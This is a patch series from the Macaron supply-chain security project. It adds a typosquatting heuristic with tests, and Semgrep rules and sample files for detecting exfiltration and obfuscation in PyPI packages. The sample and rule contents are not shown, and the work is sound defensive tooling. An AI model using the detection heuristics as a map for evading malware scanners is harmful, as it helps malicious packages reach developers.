+flask-swagger-ui +pyhdb +cron-schedule-triggers +dissect-target +fastembed +aiogoogle +lazy-imports +imap-tools +tox-ansible +lakefs-client +lcov-cobertura +salesforce-fuelsdk-sans +python-tds +twofish +tmtools +mnemonic +zope-i18nmessageid +fs-s3fs +mypy-boto3-ram +open-webui +llguidance +mypy-boto3-servicecatalog +mkl +pulp-cli-deb +mypy-boto3-location +splink +jax-cuda12-pjrt +pyxnat +py-grpc-prometheus +cdktf +pulp-glue-deb +llama-cpp-python +mypy-boto3-marketplace-entitlement +py-vapid +mypy-boto3-sso-oidc +coredis +coremltools +airflow-provider-lakefs +segtok +faiss-gpu +pockets +mypy-boto3-comprehend +mypy-boto3-securityhub +mypy-boto3-support +cmudict +starlark-pyo3 +stackprinter +sgp4 +mypy-boto3-mediaconvert +idf-component-manager +mypy-boto3-s3control +pyqtwebengine +qiskit-aer +e2b-code-interpreter +mypy-boto3-meteringmarketplace +mypy-boto3-service-quotas +mypy-boto3-synthetics +granian +clize +delocate +dbx +typos +pyprctl +pantab +rocketchat-api +prettyprinter +spaces +mypy-boto3-elb +sorl-thumbnail +dateformat +oauth2-client +hypothesis-graphql +mypy-boto3-mwaa +pydoe +mypy-boto3-route53resolver +parsl +mypy-boto3-guardduty +bpyutils +certvalidator +ffmpeg +trie +azureml-pipeline +meraki +randomname +pycobertura +pypd +mypy-boto3-connect +mypy-boto3-workspaces +valkey +mypy-boto3-amplify +gurobipy +jupyter-contrib-nbextensions +httpstan +dodgy +mypy-boto3-rekognition +stanza +mypy-boto3-sso-admin +fcache +neotime +empy +mypy-boto3-directconnect +portend +ua-parser-rs +mypy-boto3-acm-pca +dagster-pyspark +opentelemetry-instrumentation-langchain +yara-python +kaldiio +pyatlan +runez +apify-shared +mypy-boto3-cloudsearch +cut-cross-entropy +purecloudplatformclientv2 +yolo +od +einx +elasticsearch-curator +pyobjc-framework-cocoa +databind +mypy-boto3-cloudsearchdomain +pycaret +mypy-boto3-budgets +mypy-boto3-docdb +mypy-boto3-polly +auditwheel +py-bip39-bindings +django-money +clu +pyathenajdbc +mypy-boto3-license-manager +mypy-boto3-shield +mypy-boto3-storagegateway +mypy-boto3-appmesh +mypy-boto3-ec2-instance-connect +fastwarc +mypy-boto3-appsync +types-passlib +visitor +mypy-boto3-resource-groups +formencode +sliceline +mypy-boto3-mediaconnect +mypy-boto3-medialive +djangorestframework-jwt +mypy-boto3-kinesis-video-media +mypy-boto3-swf +mypy-boto3-waf +fds-sdk-paengine +mypy-boto3-machinelearning +mypy-boto3-lightsail +mypy-boto3-neptune +spark-expectations +case-conversion +ptvsd +mypy-boto3-lex-models +mypy-boto3-sdb +fds-sdk-sparengine +einops-exts +fds-protobuf-stach-extensions +mypy-boto3-serverlessrepo +mypy-boto3-kinesisvideo +mypy-boto3-kendra +sagemaker-datawrangler +varint +sphinxcontrib-napoleon +mypy-boto3-accessanalyzer +mypy-boto3-comprehendmedical +mypy-boto3-workmail +fds-protobuf-stach-v2 +batchgenerators +types-aiobotocore-sns +mypy-boto3-kinesis-video-archived-media +fds-protobuf-stach +mypy-boto3-fsx +mypy-boto3-iotsecuretunneling +mypy-boto3-workdocs +mypy-boto3-lex-runtime +mypy-boto3-outposts +bzt +mypy-boto3-snowball +mypy-boto3-backup +mypy-boto3-pi +mypy-boto3-waf-regional +autologging +mypy-boto3-marketplace-catalog +mypy-boto3-workmailmessageflow +ag2 +mypy-boto3-route53domains +mypy-boto3-timestream-write +mypy-boto3-qldb-session +mypy-boto3-sagemaker-a2i-runtime +mypy-boto3-kinesisanalytics +mypy-boto3-kinesisanalyticsv2 +mypy-boto3-codecommit +stestr +mypy-boto3-chime +mypy-boto3-pinpoint-email +mypy-boto3-mediatailor +mypy-boto3-personalize +pytest-explicit +simplefix +mypy-boto3-robomaker +basistheory +mypy-boto3-kinesis-video-signaling +mypy-boto3-mq +mypy-boto3-opsworks +pylint-celery +pytest-flake8 +spacy-curated-transformers +mypy-boto3-appstream +mypy-boto3-managedblockchain +torch-model-archiver +mypy-boto3-sms +mypy-boto3-pinpoint-sms-voice +bridgecrew +mypy-boto3-mediapackage-vod +mypy-boto3-gamelift +mypy-boto3-mturk +mypy-boto3-iotevents +viztracer +dagster-datadog +dj-rest-auth +mypy-boto3-mediapackage +mypy-boto3-imagebuilder +braintrust-api +mypy-boto3-health +mypy-boto3-mediastore-data +mypy-boto3-marketplacecommerceanalytics +mypy-boto3-savingsplans +mypy-boto3-mediastore +mypy-boto3-networkmanager +mypy-boto3-opsworkscm +mypy-boto3-qldb +arcticdb +mypy-boto3-iotthingsgraph +uptime-kuma-api +mypy-boto3-fms +mypy-boto3-compute-optimizer +mypy-boto3-sms-voice +mypy-boto3-iotanalytics +mypy-boto3-groundstation +mypy-boto3-mgh +spider-client +mypy-boto3-glacier +django-webtest +types-google-cloud-ndb +mypy-boto3-datasync +mypy-boto3-importexport +mypy-boto3-personalize-events +methoddispatch +globus-compute-endpoint +reprint +mypy-boto3-personalize-runtime +mypy-boto3-inspector +mypy-boto3-globalaccelerator +mypy-boto3-cognito-sync +mypy-boto3-cur +autogluon-features +mypy-boto3-ds +mypy-boto3-migrationhub-config +mypy-boto3-forecast +mypy-boto3-application-insights +mypy-boto3-codestar-notifications +mypy-boto3-elasticbeanstalk +mypy-boto3-iotevents-data +apache-airflow-providers-apache-beam +tm1py +mypy-boto3-iot-jobs-data +mypy-boto3-greengrass +mypy-boto3-iotsitewise +jupyter-contrib-core +mypy-boto3-emr-containers +mcap +mypy-boto3-clouddirectory +msgpack-numpy +awsebcli +mypy-boto3-autoscaling-plans +aiorun +pylibsrtp +evervault-attestation-bindings +starlette-testclient +yaml-config +mypy-boto3-ivs-realtime +mypy-boto3-cloud9 +mypy-boto3-cloudhsmv2 +django-configurations +tgcrypto +kedro-telemetry +mypy-boto3-dax +mypy-boto3-codeguru-reviewer +prefect-shell +mypy-boto3-forecastquery +secure +docling-core +mypy-boto3-devicefarm +ast-grep-cli +azure-ai-contentsafety +pysnmpcrypto +mypy-boto3-datapipeline +mypy-boto3-connectparticipant +markdown-exec +mypy-boto3-frauddetector +django-recaptcha +usaddress-scourgify +python-mimeparse +mypy-boto3-codestar-connections +gin-config +amundsen-databuilder +mypy-boto3-detective +mypy-boto3-discovery +mypy-boto3-cloudhsm +mypy-boto3-codeguruprofiler +pip-install-test +sox +panns-inference +dag-factory +tempita +evervault +mypy-boto3-elastictranscoder +sqlean-py +draftjs-exporter +mypy-boto3-macie2 +patchy +meltano +ibm-secrets-manager-sdk +pyjson5 +mdxpy +pylcs +munkres +mypy-boto3-ecr-public +python-debian +pyicu-binary +ws4py +aiotask-context +fugashi +cpplint +dagster-shell +mypy-boto3-bedrock-agent-runtime +python-schema-registry-client +meross-iot +pyocd +pyreadline +sspilib +hachoir +mypy-boto3-network-firewall +jc +rapidocr-onnxruntime +assisted-service-client +mypy-boto3-ivs +arize +mypy-boto3-appconfigdata +mypy-boto3-braket +autovizwidget +pybreaker +dbt-athena +flask-sock +pysolr +types-zstd +dm-control +hdijupyterutils +pyarabic +discord +python-binance +inscribe +g2p-en +pydeprecate +pypandoc-binary +extensionclass +antithesis +coiled +globus-identity-mapping +donfig +zope-location +doc8 +tensorflow-decision-forests +requirements-detector +literalai +mypy-boto3-s3outposts +heapdict +lifetimes +mypy-boto3-sagemaker-featurestore-runtime +semantic-link-sempy +mypy-boto3-sagemaker-edge +canopen +autogluon-tabular +mypy-boto3-servicecatalog-appregistry +files-com +streamlit-keyup +times +mypy-boto3-auditmanager +gfpgan +mypy-boto3-amp +livekit-agents +slack +mypy-boto3-iotwireless +wiki-fetch +together +wagtail +mypy-boto3-wellarchitected +pyroscope-io +flet +mypy-boto3-elastic-inference +mypy-boto3-bedrock-agent +reverse-geocoder +bravado-core +mypy-boto3-lookoutvision +sphinxcontrib-plantuml +autoray +mypy-boto3-amplifybackend +azureml-sdk +toml-sort +mypy-boto3-databrew +google-cloud-profiler +equinox +flask-apispec +asammdf +airtable +mypy-boto3-healthlake +impacket +mypy-boto3-appintegrations +pyro-ppl +mypy-boto3-greengrassv2 +mypy-boto3-lexv2-models +icalevents +mypy-boto3-customer-profiles +fastdtw +pennylane-lightning +css-inline +mypy-boto3-iotdeviceadvisor +mypy-boto3-lexv2-runtime +mypy-boto3-connect-contact-lens +zope-security +mypy-boto3-devops-guru +pdm-pep517 +pydrive +django-dirtyfields +paypalrestsdk +mltable +mypy-boto3-iotfleethub +djangorestframework-camel-case +phonemizer +distance +mkdocs-include-markdown-plugin +graphql-query +arxiv +measurement +jplephem +syncer +aioice +autogluon +python-openid +pyreadstat +amundsen-rds +azureml-inference-server-http +drf-jwt +mypy-boto3-lookoutmetrics +globus-compute-sdk +websocket +aws-kinesis-agg +pwlf +mypy-boto3-lookoutequipment +jaro-winkler +marshmallow3-annotations +mypy-boto3-mgn +mypy-boto3-fis +rust-demangler +pymupdf4llm +rlbot +pykcs11 +esp-idf-kconfig +flake8-string-format +flake8-pytest-style +mypy-boto3-s3tables +bce-python-sdk +mypy-boto3-account +human-json +mypy-boto3-payment-cryptography +mypy-boto3-ssm-incidents +mypy-boto3-apprunner +acres +mypy-boto3-payment-cryptography-data +adbc-driver-manager +typed-argument-parser +mypy-boto3-finspace +mypy-boto3-finspace-data +wiremock +mypy-boto3-ssm-contacts +kt-legacy +mypy-boto3-proton +pyvisa-py +mypy-boto3-applicationcostprofiler +youtube-dl +pybars4 +botbuilder-schema +better-exceptions +mypy-boto3-grafana +gcloud-aio-datastore +awslimitchecker +pylogbeat +pandas-flavor +keras-nightly +bump-my-version +smartystreets-python-sdk +tls-client +prefect-ray +mypy-boto3-cloudcontrol +simplekml +rpmfile +tensorflow-model-optimization +prisma +mypy-boto3-route53-recovery-control-config +xmldiff +pythran +pyproject-flake8 +connected-components-3d +django-admin-list-filter-dropdown +mypy-boto3-memorydb +mypy-boto3-chime-sdk-messaging +hist +mypy-boto3-redshift-serverless +mypy-boto3-wisdom +mypy-boto3-route53-recovery-readiness +mypy-boto3-route53-recovery-cluster +mypy-boto3-chime-sdk-identity +django-autocomplete-light +docling-parse +pymap3d +stopit +records +mediapy +cmsis-pack-manager +mypy-boto3-inspector2 +python-jsonpath +mypy-boto3-snow-device-management +azure-eventhub-checkpointstoreblob-aio +mypy-boto3-kafkaconnect +mypy-boto3-voice-id +mypy-boto3-keyspaces +pytest-codspeed +cmake-format +mplcursors +unleashclient +versionfinder +nameof +anyjson +botframework-connector +zmq +mypy-boto3-marketplace-agreement +mypy-boto3-workspaces-web +localstack +mypy-boto3-pinpoint-sms-voice-v2 +requests-gssapi +mypy-boto3-verifiedpermissions +exrex +fireworks-ai +djangorestframework-xml +mypy-boto3-opensearchserverless +mypy-boto3-cleanrooms +streamlit-folium +flake8-rst-docstrings +mypy-boto3-panorama +mypy-boto3-chime-sdk-meetings +dbt-trino +gjson +mypy-boto3-amplifyuibuilder +tencentcloud-sdk-python +mypy-boto3-billingconductor +mypy-boto3-datazone +mypy-boto3-backup-gateway +mypy-boto3-migrationhubstrategy +mypy-boto3-drs +mypy-boto3-evidently +mypy-boto3-resiliencehub +django-log-request-id +arize-phoenix +mypy-boto3-iottwinmaker +mypy-boto3-iotfleetwise +mypy-boto3-omics +mypy-boto3-rum +mypy-boto3-migration-hub-refactor-spaces +mypy-boto3-workspaces-thin-client +mypy-boto3-connectcases +crontab +chess +mypy-boto3-chime-sdk-media-pipelines +mypy-boto3-chime-sdk-voice +mypy-boto3-ivschat +mypy-boto3-rbin +extra-streamlit-components +mypy-boto3-controltower +mypy-boto3-qbusiness +stream-inflate +mypy-boto3-arc-zonal-shift +mypy-boto3-support-app +mypy-boto3-vpc-lattice +gcloud-rest-datastore +mypy-boto3-b2bi +mypy-boto3-connectcampaigns +mypy-boto3-timestream-influxdb +mypy-boto3-m2 +pygam +mypy-boto3-ssm-sap +mypy-boto3-application-signals +mypy-boto3-cost-optimization-hub +luigi +mypy-boto3-codecatalyst +mypy-boto3-license-manager-user-subscriptions +etuples +mypy-boto3-cloudtrail-data +mypy-boto3-cleanroomsml +mypy-boto3-tnb +mypy-boto3-appfabric +mypy-boto3-osis +mypy-boto3-mediapackagev2 +lap +mypy-boto3-kendra-ranking +mypy-boto3-bcm-data-exports +eccodes +mypy-boto3-resource-explorer-2 +mypy-boto3-rolesanywhere +mypy-boto3-sagemaker-metrics +mypy-boto3-internetmonitor +plyfile +rejson +mypy-boto3-taxsettings +mypy-boto3-entityresolution +mypy-boto3-artifact +mypy-boto3-neptune-graph +mypy-boto3-codeguru-security +mypy-boto3-pipes +text-generation +mypy-boto3-trustedadvisor +mypy-boto3-supplychain +mypy-boto3-migrationhuborchestrator +mypy-boto3-cloudfront-keyvaluestore +cwcwidth +django-rest-polymorphic +mypy-boto3-chatbot +stream-unzip +mypy-boto3-controlcatalog +mypy-boto3-securitylake +mypy-boto3-privatenetworks +python-jwt +mypy-boto3-oam +mypy-boto3-docdb-elastic +apache-airflow-providers-apprise +mypy-boto3-apptest +mypy-boto3-qconnect +mypy-boto3-simspaceweaver +mypy-boto3-kinesis-video-webrtc-storage +adtk +py3langid +mypy-boto3-mailmanager +paramiko-expect +mypy-boto3-pca-connector-ad +mypy-boto3-freetier +mypy-boto3-medical-imaging +mypy-boto3-managedblockchain-query +mypy-boto3-codeconnections +mypy-boto3-launch-wizard +mypy-boto3-deadline diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 7c83f637f..e0e179e7f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -23,6 +23,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.high_release_frequency import HighReleaseFrequencyAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.one_release import OneReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer +from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer @@ -333,7 +334,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: SuspiciousSetupAnalyzer, WheelAbsenceAnalyzer, AnomalousVersionAnalyzer, - WhiteSpacesAnalyzer, + TyposquattingPresenceAnalyzer, ] # name used to query the result of all problog rules, so it can be accessed outside the model. @@ -383,9 +384,9 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: failed({Heuristics.CLOSER_RELEASE_JOIN_DATE.value}), forceSetup. - % Package released with excessive whitespace in the code . + % Package released with a name similar to a popular package. {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- - forceSetup, failed({Heuristics.WHITE_SPACES.value}). + quickUndetailed, forceSetup, failed({Heuristics.TYPOSQUATTING_PRESENCE.value}). % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. diff --git a/tests/malware_analyzer/pypi/test_typosquatting_presence.py b/tests/malware_analyzer/pypi/test_typosquatting_presence.py new file mode 100644 index 000000000..2d23233a2 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_typosquatting_presence.py @@ -0,0 +1,88 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for the TyposquattingPresenceAnalyzer heuristic.""" + + +import os +from pathlib import Path +from unittest.mock import MagicMock + +import pytest + +from macaron.errors import HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer + + +@pytest.fixture(name="analyzer") +def analyzer_(tmp_path: Path) -> TyposquattingPresenceAnalyzer: + """Pytest fixture to create a TyposquattingPresenceAnalyzer instance with a dummy popular packages file.""" + # Create a dummy popular packages file. + pkg_file = Path(os.path.join(tmp_path, "popular.txt")) + popular_packages = ["requests", "flask", "pytest"] + pkg_file.write_text("\n".join(popular_packages), encoding="utf-8") + analyzer_instance = TyposquattingPresenceAnalyzer(str(pkg_file)) + return analyzer_instance + + +def test_analyze_exact_match_pass(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when the package name is an exact match to a popular package.""" + pypi_package_json.component_name = "requests" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {"package_name": "requests"} + + +def test_analyze_similar_name_fail(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when the package name is suspiciously similar to a popular package.""" + pypi_package_json.component_name = "reqursts" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["package_name"] == "reqursts" + assert info["popular_package"] == "requests" + # The ratio should match or exceed threshold. + assert isinstance(info["similarity_ratio"], float) + assert info["similarity_ratio"] >= analyzer.distance_ratio_threshold + + +def test_analyze_unrelated_name_pass(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when the package name is not similar to any popular package.""" + pypi_package_json.component_name = "launchable" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {"package_name": "launchable"} + + +def test_analyze_nonexistent_file_skip() -> None: + """Test the analyzer raises an error if the popular packages file does not exist.""" + with pytest.raises(HeuristicAnalyzerValueError) as exc_info: + TyposquattingPresenceAnalyzer("nonexistent_file.txt") + assert "Popular packages file not found or path not configured" in str(exc_info.value) + + +@pytest.mark.parametrize( + ("package1", "package2", "expected_ratio"), + [ + ("requests", "requests", 1.0), + ("reqursts", "requests", 11 / 12), + ("abcd", "wxyz", 0.0), + ], +) +def test_jaro_distance( + analyzer: TyposquattingPresenceAnalyzer, package1: str, package2: str, expected_ratio: float +) -> None: + """Test the Jaro distance calculation.""" + assert analyzer.jaro_distance(package1, package2) == expected_ratio + + +def test_empty_popular_packages_file(tmp_path: Path, pypi_package_json: MagicMock) -> None: + """Test the analyzer skips when the popular packages file is empty.""" + pkg_file = Path(os.path.join(tmp_path, "empty_popular.txt")) + pkg_file.write_text("", encoding="utf-8") + analyzer_instance = TyposquattingPresenceAnalyzer(str(pkg_file)) + result, info = analyzer_instance.analyze(pypi_package_json) + assert result == HeuristicResult.SKIP + error_msg = info.get("warning") + assert isinstance(error_msg, str) + assert "Popular packages file is empty" in error_msg From a470123e8bb39265347f037868b711743c4c9182 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 4 Jun 2025 14:05:32 +1000 Subject: [PATCH 05/14] refactor: improve experimental source code pattern analysis of pypi packages (#965) Include support for using Semgrep for analysis of source code to detect malicious code patterns, specified using Semgrep's YAML files. Signed-off-by: Carl Flottmann --- .pre-commit-config.yaml | 18 + .semgrepignore | 1 + CONTRIBUTING.md | 4 + docker/Dockerfile.final | 2 +- ...re_analyzer.pypi_heuristics.sourcecode.rst | 8 + pyproject.toml | 11 +- .../samples_permissions_checker.sh | 37 ++ src/macaron/__main__.py | 23 +- src/macaron/config/defaults.ini | 25 +- src/macaron/errors.py | 4 + src/macaron/malware_analyzer/README.md | 50 +- .../pypi_heuristics/heuristics.py | 3 + .../pypi_sourcecode_analyzer.py | 491 ------------------ .../sourcecode/pypi_sourcecode_analyzer.py | 330 ++++++++++++ .../pypi_heuristics/suspicious_pattern.yaml | 101 ---- src/macaron/repo_finder/repo_finder_pypi.py | 2 +- .../pypi_malware_rules/exfiltration.yaml | 271 ++++++++++ .../pypi_malware_rules/obfuscation.yaml | 313 +++++++++++ src/macaron/slsa_analyzer/analyze_context.py | 9 +- src/macaron/slsa_analyzer/analyzer.py | 24 +- .../checks/detect_malicious_metadata_check.py | 84 ++- .../package_registry/pypi_registry.py | 277 +++++++--- src/macaron/util.py | 8 +- .../check_sourcecode_patterns.sh | 14 + .../policy-sourcecode.dl | 10 + .../test.yaml | 25 +- .../pypi/resources/custom_sample.yaml | 23 + .../exfiltration/expected_results.json | 25 + .../exfiltration/remote_exfiltration.py | 50 ++ .../obfuscation/decode_and_execute.py | 67 +++ .../obfuscation/expected_results.json | 235 +++++++++ .../obfuscation/inline_imports.py | 32 ++ .../obfuscation/obfuscation_tools.py | 69 +++ .../pypi/test_pypi_sourcecode_analyzer.py | 290 +++++++++++ .../test_detect_malicious_metadata_check.py | 30 +- 35 files changed, 2245 insertions(+), 721 deletions(-) create mode 100644 .semgrepignore create mode 100755 scripts/dev_scripts/samples_permissions_checker.sh delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/exfiltration.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/obfuscation.yaml create mode 100755 tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh create mode 100644 tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl create mode 100644 tests/malware_analyzer/pypi/resources/custom_sample.yaml create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py create mode 100644 tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. - repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -65,6 +67,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -82,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -94,6 +98,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. @@ -106,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. @@ -197,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. diff --git a/docker/Dockerfile.final b/docker/Dockerfile.final index ad1d88c19..49c1071cf 100644 --- a/docker/Dockerfile.final +++ b/docker/Dockerfile.final @@ -46,7 +46,7 @@ RUN : \ && . .venv/bin/activate \ && pip install --no-compile --no-cache-dir --upgrade pip setuptools \ && find $HOME/dist -depth \( -type f \( -name "macaron-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ - && pip uninstall semgrep \ + && pip uninstall semgrep -y \ && find $HOME/dist -depth \( -type f \( -name "semgrep-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ && rm -rf $HOME/dist \ && deactivate diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..74705364b 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -119,12 +120,14 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] - +exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 - +force-exclude = ''' +tests/malware_analyzer/pypi/resources/sourcecode_samples/ +''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -170,7 +173,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -181,7 +183,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = true @@ -209,7 +210,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -261,6 +261,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..fcbd3658b --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,37 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. && pwd)" 